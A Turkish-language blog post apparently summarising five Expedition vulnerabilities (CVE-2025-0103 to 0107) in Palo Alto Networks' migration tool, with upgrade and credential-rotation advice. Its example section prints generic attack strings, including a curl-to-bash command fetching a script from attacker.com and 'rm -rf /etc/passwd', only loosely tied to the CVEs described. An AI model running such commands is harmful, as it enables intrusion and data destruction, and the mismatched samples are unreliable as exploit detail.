Palo Alto Networks’ün Expedition Migration aracında birden fazla güvenlik açığı keşfedildi. Bu açıklar, ağ güvenliği yöneticileri için ciddi bir tehdit oluşturuyor çünkü güvenlik duvarı kimlik bilgilerini, kullanıcı adlarını, açık metin şifrelerini, cihaz yapılandırmalarını ve API anahtarlarını ifşa edebiliyor. Expedition, üçüncü taraf güvenlik duvarlarından Palo Alto Networks’ün Yeni Nesil Güvenlik Duvarı (NGFW) platformuna yapılandırma geçişi yapmak için tasarlanmış ücretsiz bir araçtır. Ancak, bu araç yalnızca geçiş süreçleri sırasında kullanılması için önerilmektedir ve üretim ortamlarında kullanılmamalıdır. Araç, 31 Aralık 2024 itibariyle Sonlandırılma (EoL) aşamasına gelmiştir.
Etkilenen Sürümler ve Dosyalar
Palo Alto Networks tarafından keşfedilen ve CVE kimlik numaralarıyla takip edilen açıklar şunlardır:
- CVE-2025-0103 (CVSS 7.8): SQL enjeksiyonu zafiyeti, kimlik doğrulama işlemi gerçekleştiren saldırganların Expedition veritabanına erişmesini sağlayarak şifre karmaşları ve cihaz yapılandırmaları gibi hassas bilgileri ortaya çıkarabiliyor. Bu açık ayrıca saldırganların sistemdeki dosyaları okumasına veya yaratmasına imkan tanıyor.
- CVE-2025-0104 (CVSS 4.7): Yansıyan çapraz site betik (XSS) zafiyeti, saldırganların kimlik doğrulaması yapılmış bir kullanıcının tarayıcısında kötü niyetli JavaScript kodları çalıştırmasına olanak verir. Bu da kimlik avı saldırıları veya oturum hırsızlıklarına yol açabilir.
- CVE-2025-0105 (CVSS 2.7): Rastgele dosya silme zafiyeti, kimlik doğrulaması yapılmamış saldırganların Expedition sisteminin “www-data” kullanıcısı altında bulunan dosyaları silmesini sağlar.
- CVE-2025-0106 (CVSS 2.7): Wildcard genişleme zafiyeti, kimlik doğrulaması yapılmamış saldırganların sistemdeki dosyaları listelemesine imkan verir.
- CVE-2025-0107 (CVSS 2.3): OS komut enjeksiyonu zafiyeti, kimlik doğrulaması yapılmış saldırganların “www-data” kullanıcısı olarak rastgele işletim sistemi komutları çalıştırmasına ve güvenlik duvarı kimlik bilgilerini açık metin olarak ortaya çıkarmasına olanak verir.
Örnek Kodlar ve Sömürüler
Bu açıkların nasıl sömürülebileceğine dair bazı örnekler:
SQL Enjeksiyonu (CVE-2025-0103): Saldırganlar, SQL enjeksiyonu yaparak veritabanına erişebilir ve hassas bilgileri ele geçirebilir.
Örnek:
' OR '1'='1'; --Yansıyan Cross-Site Scripting (XSS) (CVE-2025-0104): Saldırganlar, kullanıcıların tarayıcılarında kötü niyetli JavaScript kodları çalıştırabilir.
Örnek:
<script>alert('XSS Attack');</script>Dosya Silme (CVE-2025-0105): Kimlik doğrulaması yapılmamış saldırganlar, kritik dosyaları silebilir.
Örnek:
rm -rf /etc/passwdOS Komut Enjeksiyonu (CVE-2025-0107): Kimlik doğrulaması yapılmış saldırganlar, OS komutlarını çalıştırabilir.
Örnek:
curl http://attacker.com/malicious_script.sh | bashEtkilenip Etkilenmediğinizi Kontrol Etme
Etkilenip etkilenmediğinizi kontrol etmek için:
- Sürüm Kontrolü
Expedition aracınızın sürümünü kontrol edin. Eğer sürüm 1.2.101 veya sonrasındaysa, yamalar uygulanmıştır ve güvenlik açığına karşı korunuyorsunuz. - Sistem Güncellemesi ve Yama Durumu
Palo Alto Networks’ün resmi web sitesinden güncelleme bilgilerini kontrol edin. Eğer eski sürüm kullanıyorsanız, hemen güncelleme yapmalısınız.
Çözüm ve Öneriler: Etkilenen Sürümler ve Yükseltme Gereksinimleri
Etkilenen sürümleri ve gerekli yükseltmeleri tablo halinde aşağıda bulabilirsiniz:
| Etkilenen Sürüm | Gerekli Sürüm | Açıklama |
|---|---|---|
| 1.2.100 ve önceki | 1.2.101 ve sonrası | Bu sürümdeki açıklar kapatılmıştır. Hemen yükseltme yapılmalıdır. |
| 1.2.101 ve sonrası | Güncel Sürüm (Yama Uygulandı) | Bu sürümde güvenlik yamaları mevcuttur, güncellenmelidir. |
Ekstra Çözüm Önerileri:
- Kimlik Bilgisi Yenileme: Expedition aracını güncelledikten sonra, araç aracılığıyla işlenen tüm kimlik bilgilerini hemen değiştirin.
- Erişim Kontrolü: Ağ erişimini yalnızca yetkilendirilmiş kullanıcılara sınırlayın.
- Kullanılmayan Örnekleri Kapatma: Kullanılmayan Expedition örneklerini kapatın.
Sonuç ve Öneriler
Aktif bir saldırı kanıtı henüz bulunmamış olsa da, benzer açıklar için proof-of-concept (PoC) exploitlerinin bulunması, gelecekteki saldırılar konusunda endişeleri artırmaktadır. Expedition aracı kullanarak güvenlik duvarı geçişi gerçekleştiren organizasyonlar, sistemlerini güvence altına almak ve yetkisiz erişimi engellemek için hızla harekete geçmelidir.
Palo Alto Networks, firewall geçişi ve politika optimizasyonu için alternatif araçlar önermektedir. Expedition’ın sonlandırılması nedeniyle, organizasyonlar bu araçları kullanmayı bırakmalı ve geçiş için önerilen alternatiflere geçiş yapmalıdır. Bu keşif, geçici araçların güvenliğinin, kritik işlemler sırasında hassas verileri işlerken ne kadar önemli olduğunu bir kez daha gözler önüne sermektedir.
Kapanış ve Etiketler
Bu yazı, Palo Alto Networks’ün Expedition aracındaki zafiyetlerin detaylı bir şekilde ele alındığı teknik bir incelemedir. Güvenlik duvarı geçişlerinde kullanılan geçici araçların güvenliği konusunda dikkatli olunması gerektiğini vurgulamaktadır.
#CyberSecurity #NetworkSecurity #Firewall #PaloAlto #Expedition #CVE
About the Author
